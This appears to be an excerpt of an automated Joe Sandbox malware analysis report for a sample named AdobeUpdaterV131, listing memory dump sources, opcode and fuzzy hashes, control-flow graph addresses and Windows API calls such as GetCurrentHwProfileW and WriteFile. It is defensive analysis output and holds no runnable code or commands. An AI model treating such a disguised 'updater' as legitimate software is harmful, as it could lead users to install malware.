                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3a3e5c179073b18b6ab123c9f3e2de02e3a48fe7f91ea563f7c72a22f443332
                                      • Instruction ID: 3cc08eb498ce7fa4c03c48c49931705556d4d1aafcf3b95b1c359b50c5d70c2d
                                      • Opcode Fuzzy Hash: c3a3e5c179073b18b6ab123c9f3e2de02e3a48fe7f91ea563f7c72a22f443332
                                      • Instruction Fuzzy Hash: 3761F3EB30C115BDB20281851B60AF6676EE7DB3707308437F407DAA22FA946ACB7531

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 283 4f10503-4f1053f 285 4f10551-4f1055b call 4f1055c 283->285 288 4f10546-4f10550 285->288 289 4f1055d-4f10736 call 4f1074f 285->289 288->285 313 4f1073b-4f10779 GetCurrentHwProfileW 289->313 315 4f10784-4f10a44 call 4f10a46 313->315
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 947627f75041be7743804ec5ee348df60a057a63c6fdb9c04706f5cd80b0e930
                                      • Instruction ID: d41d3a0512371f2119e0a29db3d3798d269d9f754a36e77ae70dfeee60898090
                                      • Opcode Fuzzy Hash: 947627f75041be7743804ec5ee348df60a057a63c6fdb9c04706f5cd80b0e930
                                      • Instruction Fuzzy Hash: 306104EB30C215BDB20281551B50AFA676EE7DB3707308437F407D6A22FA946ACB7531

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 416 4f10521-4f1053f 418 4f10551-4f1055b call 4f1055c 416->418 421 4f10546-4f10550 418->421 422 4f1055d-4f10736 call 4f1074f 418->422 421->418 446 4f1073b-4f10779 GetCurrentHwProfileW 422->446 448 4f10784-4f10a44 call 4f10a46 446->448
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d0224aea360bf4068b6f9ad5a57b68901e123819ecabd623c34c46caa8da86c0
                                      • Instruction ID: 657ca6c24cc3a8585cd5d8a519a9c71da736f56573bf5feb636230a3f95df585
                                      • Opcode Fuzzy Hash: d0224aea360bf4068b6f9ad5a57b68901e123819ecabd623c34c46caa8da86c0
                                      • Instruction Fuzzy Hash: 9061F2EB30C115BDB20281855B64AFA676EE7DB3307308437F407D6A22FA946ACB7531

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 482 4f1055c-4f10736 call 4f1074f 507 4f1073b-4f10779 GetCurrentHwProfileW 482->507 509 4f10784-4f10a44 call 4f10a46 507->509
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: d5b60d67286c137c9a3a32a85bb11387813a2294b47d3edfa8ab23491f59aa33
                                      • Instruction ID: 05c9a3c47d35e6e928c860b7e25d3b3f8740b30b01dda8ef486ec41e89e75934
                                      • Opcode Fuzzy Hash: d5b60d67286c137c9a3a32a85bb11387813a2294b47d3edfa8ab23491f59aa33
                                      • Instruction Fuzzy Hash: C951E1EB30C115BDB10290455B60AF6666EE7DB3307308036F407D6A22FE946ACB7531

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 543 4f10582-4f10586 544 4f10588-4f1058b 543->544 545 4f1058d-4f10736 call 4f1074f 543->545 544->545 567 4f1073b-4f10779 GetCurrentHwProfileW 545->567 569 4f10784-4f10a44 call 4f10a46 567->569
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f1fec6d438effa44d0c186b10e2d0575c556899054f963e8c9d90d74be4b862
                                      • Instruction ID: 5d4f9fdc6074dcf2e9bb311677239d5287dd22399115f6b7ea6df04fcfb91fc8
                                      • Opcode Fuzzy Hash: 2f1fec6d438effa44d0c186b10e2d0575c556899054f963e8c9d90d74be4b862
                                      • Instruction Fuzzy Hash: 1151EFEB30C125BDB10290455B64AFA666EE7DA3707308037F407D6A21FE946ACB7531

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 603 4f105dc-4f105dd 604 4f1059d-4f105d7 603->604 605 4f105df-4f105e1 603->605 607 4f105e4-4f10736 call 4f1074f 604->607 605->607 626 4f1073b-4f10779 GetCurrentHwProfileW 607->626 628 4f10784-4f10a44 call 4f10a46 626->628
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 25db79dfcb4f327049e67d4aa396909095f03306715f145c3ab49d7708a2f36b
                                      • Instruction ID: b794d4ad1971fd2350399ed632b4aee4160d52ff210e8c6e37a5f247f778198b
                                      • Opcode Fuzzy Hash: 25db79dfcb4f327049e67d4aa396909095f03306715f145c3ab49d7708a2f36b
                                      • Instruction Fuzzy Hash: 385123EB30C115BDB20285515B60AFA6B6EE7D6330B308437F407D6A22FE946ACB7531

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 662 4f1059e-4f10736 call 4f1074f 683 4f1073b-4f10779 GetCurrentHwProfileW 662->683 685 4f10784-4f10a44 call 4f10a46 683->685
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: dcb5a43d465f5275ac41b283016f314bdf8ccac0f957deb67496d3523f2b95c5
                                      • Instruction ID: 2777a0193eb276f111e1965dd3a6eb8b7b0e885df2f58e211a3469aa27b25ffe
                                      • Opcode Fuzzy Hash: dcb5a43d465f5275ac41b283016f314bdf8ccac0f957deb67496d3523f2b95c5
                                      • Instruction Fuzzy Hash: CE5102EB30C115BDB212D0415B60AFA666EE7DA370B308437F407D6A62FE946ACB3531

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 776 4f105c5-4f10736 call 4f1074f 796 4f1073b-4f10779 GetCurrentHwProfileW 776->796 798 4f10784-4f10a44 call 4f10a46 796->798
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 92659969a837042a94430d76798c2636a2664d37d98bc23675a551beed87806c
                                      • Instruction ID: 2a837d765585f96b643f9369906f01997b191741308e99946edfb1863aed1bf0
                                      • Opcode Fuzzy Hash: 92659969a837042a94430d76798c2636a2664d37d98bc23675a551beed87806c
                                      • Instruction Fuzzy Hash: C351E3EB30C125BDB112D0415B60AFA666EE7DA3307308036F507D6A61FE946ACB7431

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 719 4f105ba-4f10736 call 4f1074f 740 4f1073b-4f10779 GetCurrentHwProfileW 719->740 742 4f10784-4f10a44 call 4f10a46 740->742
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 83598e4d3b823cdbb8c405fc19a8c49ca5287af79550ee1ba801b30bcd9b5cd8
                                      • Instruction ID: 321d7c32c23ebc74edb692da4f9cc38a58939cf103d449473876b3360c45d03d
                                      • Opcode Fuzzy Hash: 83598e4d3b823cdbb8c405fc19a8c49ca5287af79550ee1ba801b30bcd9b5cd8
                                      • Instruction Fuzzy Hash: 4651D3EB30C125BDB112D0415B60AFA666EE7DA370B308437F507D6A61FE946ACB7431

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 832 4f10622-4f10627 833 4f10629 832->833 834 4f10608-4f1061d 832->834 835 4f1062b-4f10736 call 4f1074f 833->835 834->835 849 4f1073b-4f10779 GetCurrentHwProfileW 835->849 851 4f10784-4f10a44 call 4f10a46 849->851
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b82e7a76f8134dfb2f55c973da4f2c064335866eff06fa061b0bc453a301a500
                                      • Instruction ID: 16f0b19c11d690aef4df7c41639b89cf80f95833c794942d15ff4559ddb0f834
                                      • Opcode Fuzzy Hash: b82e7a76f8134dfb2f55c973da4f2c064335866eff06fa061b0bc453a301a500
                                      • Instruction Fuzzy Hash: 2951E3AB30C125ADB212D0551B60AFA676EE7D6330B308077F407D6A61FA946ACB7431
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: ab018d0c31fb917553119a379a51aa1b54bcc297cc567dffd00d51e6c8860c71
                                      • Instruction ID: ec0a32494222de11eeaa402a4821b2da546519caefdc8fbbed36c4f4ed8df2a2
                                      • Opcode Fuzzy Hash: ab018d0c31fb917553119a379a51aa1b54bcc297cc567dffd00d51e6c8860c71
                                      • Instruction Fuzzy Hash: 5C51E3EB30C125BDB212D0515B60AFA666EE7D6330B308037F407D6A62FE946ACB7431
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 702dd0edbe73d0eb80f7a5ff9e76a42853bbedc82a92aee35430828ecf23f7e6
                                      • Instruction ID: c903059a9e0489806b3dd5b6d042bef97857c2f40ec1f928122277d2a6b078a1
                                      • Opcode Fuzzy Hash: 702dd0edbe73d0eb80f7a5ff9e76a42853bbedc82a92aee35430828ecf23f7e6
                                      • Instruction Fuzzy Hash: 3851F3EB30C125BDB212D0425B60AFA666EE7DA3307308077F507D6A61FE946ACB7431
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: ae4996b0bc1a88213143e27782f2eebd3eea8f8b773e7639e03581caa8a735db
                                      • Instruction ID: e17c3ca5986649721243af36706e7843d0244bfe48583b62b7d4be0d1a3200ab
                                      • Opcode Fuzzy Hash: ae4996b0bc1a88213143e27782f2eebd3eea8f8b773e7639e03581caa8a735db
                                      • Instruction Fuzzy Hash: C15104EB30C125BDB112D4411B60AFA666EE7DA3307308037F507C6A62FE946ACB7431
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 36923bb64480b13af5470ff85d4dca4219efb02467be85e527ee7cbfc531dedc
                                      • Instruction ID: 3092a6c61c072286f9280f8d75c87dc2c58f24aa6349fa3d078455d86fc3a59c
                                      • Opcode Fuzzy Hash: 36923bb64480b13af5470ff85d4dca4219efb02467be85e527ee7cbfc531dedc
                                      • Instruction Fuzzy Hash: 8A41E4EB30C125BDB112D0521B60AFA666EE7DA3307308077F507D6A62FE946ACB7431
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 1da2cb999cb798c1c588c66f4f938c649aca3626b7e9bf0ae7131a78786ed685
                                      • Instruction ID: 19ad5f34de1f02b3417ee2366734aabca962f08ed553c47f5c18f97616cc397a
                                      • Opcode Fuzzy Hash: 1da2cb999cb798c1c588c66f4f938c649aca3626b7e9bf0ae7131a78786ed685
                                      • Instruction Fuzzy Hash: 3B41F3EB30C125BDB11290421B60AFA666EE7DA3307308077F507D6E62FE946ACB7431
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04F10767
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 1444055840fd287425e30e7b8ab3fb21671c05d0f9252c1f1f21ff1484744403
                                      • Instruction ID: d89f3ffeb7cd2d0d486d3da7bcb493b9ba325446ed99e8738e2f463c73df55cf
                                      • Opcode Fuzzy Hash: 1444055840fd287425e30e7b8ab3fb21671c05d0f9252c1f1f21ff1484744403
                                      • Instruction Fuzzy Hash: D74114AB30C125ADB112D4525BA0AFA666EE7DB3307304036F507DAA61FE946ACB7431
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04F10767
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 4d1cc689711ccf105b0e0d07578f82fd33967ab3ed8ae4b1aa9ca75f43bbcd09
                                      • Instruction ID: 49ac80a8a621a552cdc81c9be3e741ece02d46fc3870ee50387e0d88cc63186f
                                      • Opcode Fuzzy Hash: 4d1cc689711ccf105b0e0d07578f82fd33967ab3ed8ae4b1aa9ca75f43bbcd09
                                      • Instruction Fuzzy Hash: 804135E720C125BDB21294511B60AF66A6EE7DB3307304076F507CAA62FE946ACB7531
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 6f8c6240c1793ecdf109481ffd7745096a5221eb6e405984cd8775a27fe0ee4a
                                      • Instruction ID: ae60d15db38f7705f6bdddff05f587c70aefd08e9398cd257854321d95f52a01
                                      • Opcode Fuzzy Hash: 6f8c6240c1793ecdf109481ffd7745096a5221eb6e405984cd8775a27fe0ee4a
                                      • Instruction Fuzzy Hash: EB4126E730C129BDB11294511B61AFA6A6EE7DB3307304077F507CAA62FE946ACB7431
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: f8e0d0e823a55398fb878a9f25884c09c203ff043983d89afa85b96a78d5250a
                                      • Instruction ID: 2552676b32c65704788bbddb2087e48eddfedf1c88baade30a133226ebc252d2
                                      • Opcode Fuzzy Hash: f8e0d0e823a55398fb878a9f25884c09c203ff043983d89afa85b96a78d5250a
                                      • Instruction Fuzzy Hash: 9E4123EB30C115BDB11290911B60AF6666EE7DB3307704036F507CAA62FED46ACB7431
                                      APIs
                                      • WriteFile.KERNEL32(?,00000000,00705DA7,?,00000000,00000000,00000000,?,00000000,?,006FB2D2,00705DA7,00000000,006FB2D2,?,?), ref: 00712341
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 7ae19bd9220b090cf7973e65e8bab8ce1da48512c6a55bb96bb1041c791cf1a9
                                      • Instruction ID: f17b05191795d8d76a2277bbfd3398e442245f5ce69f71360b9759c49eeabf86
                                      • Opcode Fuzzy Hash: 7ae19bd9220b090cf7973e65e8bab8ce1da48512c6a55bb96bb1041c791cf1a9
                                      • Instruction Fuzzy Hash: F161D571D04119AFDF01CFACD844EEE7BB9BF09304F150145E910AB292D379DAA2CBA0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: e527b36be142bd2c6bcc65f7ab80727a36e0d0a8e217c574cb32c043c0bb833a
                                      • Instruction ID: 13446a29e19a20339f39240530d900978f126dc16badcfa5216711713e65cbba
                                      • Opcode Fuzzy Hash: e527b36be142bd2c6bcc65f7ab80727a36e0d0a8e217c574cb32c043c0bb833a
                                      • Instruction Fuzzy Hash: 964124E730C115BDB21290911BA0AF6676EE7DB3307304076F507CAA62FE946ACB7531
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04F10767
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: e15d2f70ea23c700511ed1fc469c34857603044e18c3ee9474e0d28bfe1776c8
                                      • Instruction ID: 3c2bcb470d0f28f7a0152d44e644d3a3c104d474e0b2ac69305503e987a5ccd8
                                      • Opcode Fuzzy Hash: e15d2f70ea23c700511ed1fc469c34857603044e18c3ee9474e0d28bfe1776c8
                                      • Instruction Fuzzy Hash: 434135A730C115BDB21294511B61AF66B6EE7CB3307304076F507CAA62FED46ACB3131
                                      APIs
                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0068AE01
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task
                                      • String ID:
                                      • API String ID: 118556049-0
                                      • Opcode ID: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
                                      • Instruction ID: 35e277393f7ec240700f43a79d2dfe90b4e9cd2939f24a97c84722cd2ef124b1
                                      • Opcode Fuzzy Hash: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
                                      • Instruction Fuzzy Hash: 624116729001199BDB15EFA8DC806AEBBA6EF44301F1407AAFC04EB301D770DE119BD6
                                      APIs
                                      • FindCloseChangeNotification.KERNEL32(00000000,00000000,CF830579,?,00711719,00000000,CF830579,0074FCB8,0000000C,007117D5,007058DD,?), ref: 00711888
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 3c840b58035e0320c6b68bc0c06a1558200d193d9ff7507cc00689ed4ccdf3a4
                                      • Instruction ID: b060e7e83493806178d5027612223b9ca6fa0ddb4acfbe895c3e118b8b6b10e2
                                      • Opcode Fuzzy Hash: 3c840b58035e0320c6b68bc0c06a1558200d193d9ff7507cc00689ed4ccdf3a4
                                      • Instruction Fuzzy Hash: 83116B336182545AD729237CA8067FE6B998F82738F75C229FE048F1D2EE6D9CC1C155
                                      APIs
                                      • SetFilePointerEx.KERNEL32(00000000,00000000,0074F970,006FB2D2,00000002,006FB2D2,00000000,?,?,?,0070AE86,00000000,?,006FB2D2,00000002,0074F970), ref: 0070ADB8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
